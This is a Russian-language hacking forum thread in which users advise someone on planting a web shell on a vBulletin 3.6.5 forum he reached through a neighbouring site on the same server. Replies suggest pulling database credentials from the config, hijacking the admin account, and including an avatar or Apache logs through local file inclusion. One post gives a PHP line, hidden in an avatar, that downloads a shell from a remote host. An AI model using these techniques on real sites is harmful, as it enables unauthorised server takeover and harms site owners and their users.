vBulletin® 3.6.5 взлом

Discussion in 'Песочница' started by heks, 21 Dec 2007.

  1. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    привет всем тут у меня такой вопрос имею доступ к db форума vBulletin® 3.6.5, через шел находящийся на этом же сервере но на другом сайте как мне залить шел на данный форум зная какие директории на нем находятся. Залить шел на взломаный сайт от имени того пользователя у меня не хватает прав но дубаю через базу данных должно хватить прав на запись потому что запрос будет производиться от имени того пользователя чья база данных
     
    #1 heks, 21 Dec 2007
    Last edited: 21 Dec 2007
  2. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    Ну ты как-то узнал имя и пароль пользователя базы данных :) Значит есть права на чтение файлов. Вероятно, что на просмотр листинга тоже. А если и нет, попробуй через базу сменить пароль админу или создать нового админа и попробуй залить шелл. ХЗ можно ли в этой версии залить шелл из админки
     
  3. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    дело в том что чтение файлов есть а вот как залить шел через запрос я незная шел у меня s99shell нужно запрос сделать что бы после него на сайте создался шел с заданным содержанием
     
  4. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    Не понимаю что тут сложного. Если очень надо, могу тебе шелл залить :) Пиши в ПМ
     
  5. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    дело в том что сайт друга да и самому на будущее надо знать как это делается у меня не сложный вопрос. думаю людям будет нетрудно составитьзапрос который заливает шел через базу данных сам в мускуле я не силен поэтому и прошу помощи.
    просто есть желание снять по этому поводу видео а то что я приконнектился к базе и сменил пасс админа это больно уж примитивно. Сайт кстати тоже по хакерской тематике
     
    #5 heks, 21 Dec 2007
    Last edited: 21 Dec 2007
  6. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    Так у тебя шелл или только доступ к базе?
     
  7. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    у меня шел есть но на другом сайте. на серваке локальный инклуд поэтому я могу читать файлы других пользователей. и могу приконнектиться к базе данных
     
  8. mad_xakep

    mad_xakep Banned

    Joined:
    10 Apr 2007
    Messages:
    190
    Likes Received:
    68
    Reputations:
    0
    я тож нече непойму ты щелл на сервак залил ? и неможешь его запустить чтоль?
     
  9. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    Если это действительно инклуд, а не читалка, то ты можешь проинклудить что-нибудь, аватару, например. Или логи апача.
     
  10. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    558
    Likes Received:
    306
    Reputations:
    27
    Как я понял но тот сайт на который хочешь залить шелл стоит vBulletin® 3.6.5 и у тебя есть возможность читать его дириктории, посмотри в конфиге пасс и логин на конект к мускулю, конется к мускулю, выташи пасс админа и побрудь или поменяй на время на свой, залей шелл через админку и все.
     
  11. am@tory

    am@tory Elder - Старейшина

    Joined:
    8 Jan 2007
    Messages:
    65
    Likes Received:
    16
    Reputations:
    5
    Проще так
    только принклюдить шелл через аватару вдруг доступ к дб, только лх.
     
  12. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    кто знает в какие диры можно заливать файлы в этом форуме. это бы тоже пригодилося
     
  13. am@tory

    am@tory Elder - Старейшина

    Joined:
    8 Jan 2007
    Messages:
    65
    Likes Received:
    16
    Reputations:
    5
    залей аву с
    <?php copy("http://www.site/shell.txt","them.php"); ?>

    и инклюдь ее
     
  14. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    шел через админку это как то уже наиграно хочется так как я пояснял выше
     
  15. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    558
    Likes Received:
    306
    Reputations:
    27
    У тебя же есть шелл на сайте по "соседству", посмотри им, хз что там админ запретил а что нет.
     
  16. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    инклуд находится не на этом сайте а на другом
     
  17. am@tory

    am@tory Elder - Старейшина

    Joined:
    8 Jan 2007
    Messages:
    65
    Likes Received:
    16
    Reputations:
    5
    Я что то запутался..
    у тебя на жертве, есть инлюд или шелл? или тока пасс от дб??
     
  18. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    на соседнем сайте у меня полный доступ ко всем файлам и редактирование тоже на этом же нет ни диры для записи ни редактирования файлов по крайне мере я ее не нашелдиры для записи
     
  19. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    у меня шел на соседнем сайте я могу читать соседние сайты но доступа на запись нету вот в чем проблема
     
  20. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    558
    Likes Received:
    306
    Reputations:
    27
    Че ты тупиш, я тебе говорю посмотри с помошью шелла, что там на соседнем сайте, например -rw-r--r--.
    Стукани в аську, если хочешь посмотрю.